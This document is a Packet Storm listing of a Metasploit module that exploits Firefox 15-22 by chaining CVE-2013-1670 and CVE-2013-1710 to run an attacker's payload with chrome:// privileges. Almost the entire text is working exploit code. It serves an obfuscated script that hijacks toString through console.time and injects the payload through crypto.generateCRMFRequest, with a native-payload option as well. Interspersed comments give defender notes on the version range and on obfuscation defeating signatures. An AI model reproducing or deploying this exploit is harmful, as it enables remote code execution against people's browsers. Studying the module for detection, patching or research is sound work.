
Firefox toString console.time Privileged Javascript Injection

2014-08-1800:00:00
moz_bug_r_a4
packetstormsecurity.com
26

0.946 High

EPSS

Percentile

99.0%

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'rex/exploitation/jsobfu'  
  
# Browser-server exploit module for Firefox 15-22 (the range fixed by the
# autopwn_info block and the BrowserRequirements lambda below). It serves one
# HTML page whose obfuscated script chains the two referenced issues
# (CVE-2013-1670, CVE-2013-1710) to run the mixin-supplied payload in a
# chrome://-privileged context.
#
# Defender notes, limited to what this file shows:
# - The version gate ends at Firefox 22 (:ua_maxver and the :ua_ver lambda);
#   a browser outside 15..22 is rejected by BrowserRequirements before any
#   exploit content is returned, so keeping Firefox current is the mitigation.
# - The served script goes through Rex::Exploitation::JSObfu, so a signature
#   written against the literal source in generate_html will not match live
#   traffic. NOTE(review): JSObfu output presumably differs per request —
#   confirm before relying on any content-based rule.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # Browser Autopwn registration: Firefox 15.0 through 22.0, JavaScript required.
  autopwn_info({
    :ua_name => HttpClients::FF,
    :ua_minver => "15.0",
    :ua_maxver => "22.0",
    :javascript => true,
    :rank => ExcellentRanking
  })

  # Registers module metadata, targets, browser requirements and options.
  #
  # @param info [Hash] base module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Firefox toString console.time Privileged Javascript Injection',
      'Description' => %q{
This exploit gains remote code execution on Firefox 15-22 by abusing two separate
Javascript-related vulnerabilities to ultimately inject malicious Javascript code
into a context running with chrome:// privileges.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'moz_bug_r_a4', # discovered CVE-2013-1710
        'Cody Crews', # discovered CVE-2013-1670
        'joev' # metasploit module
      ],
      'DisclosureDate' => "May 14 2013",
      'References' => [
        ['CVE', '2013-1670'], # privileged access for content-level constructor
        ['CVE', '2013-1710'] # further chrome injection
      ],
      # Target 0 stays inside the browser's JS runtime; target 1 uses a native
      # payload for the listed platforms.
      'Targets' => [
        [
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch' => ARCH_FIREFOX
          }
        ],
        [
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch' => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0,
      # Only script-sourced requests from a Firefox UA whose major version is
      # 15..22 reach on_request_exploit.
      'BrowserRequirements' => {
        :source => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver => lambda { |ver| ver.to_i.between?(15, 22) }
      }
    ))

    # CONTENT: optional operator-supplied HTML placed verbatim inside <body>
    # (see generate_html); it is not escaped.
    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
    ], self.class)
  end

  # Responds to a browser that passed BrowserRequirements with the generated page.
  #
  # @param cli [Object] client connection handed over by BrowserExploitServer
  # @param request [Object] the HTTP request (not read here)
  # @param target_info [Hash] browser fingerprint passed through to generate_html
  def on_request_exploit(cli, request, target_info)
    send_response_html(cli, generate_html(target_info))
  end

  # Builds the HTML document served to a matching browser.
  #
  # @param target_info [Hash] browser fingerprint (unused in this method; kept
  #   for the callback signature)
  # @return [String] HTML page containing the obfuscated script and the raw
  #   CONTENT option
  def generate_html(target_info)
    # Random 5..16-character property name under which the payload JS is
    # stored in opts; the script reads it back by the same name.
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin

    # Script source prior to obfuscation. The toString override is guarded by
    # q so it runs once, is triggered through console.time(y), and passes the
    # stored payload string as an argument to crypto.generateCRMFRequest.
    # NOTE(review): JSON.unparse is an older alias of JSON.generate — confirm
    # it is still provided by the framework's json gem.
    js = Rex::Exploitation::JSObfu.new(%Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];
var y = {}, q = false;
y.constructor.prototype.toString=function() {
if (q) return;
q = true;
crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");
return 5;
};
console.time(y);
|)

    # Obfuscates in place; the #{js} interpolation below presumably relies on
    # JSObfu#to_s returning the obfuscated code — verify against
    # rex/exploitation/jsobfu.
    js.obfuscate

    # CONTENT is interpolated without escaping by design: it is the operator's
    # own HTML, not browser-supplied input.
    %Q|
<!doctype html>
<html>
<body>
<script>
#{js}
</script>
#{datastore['CONTENT']}
</body>
</html>
|
  end
end
  
`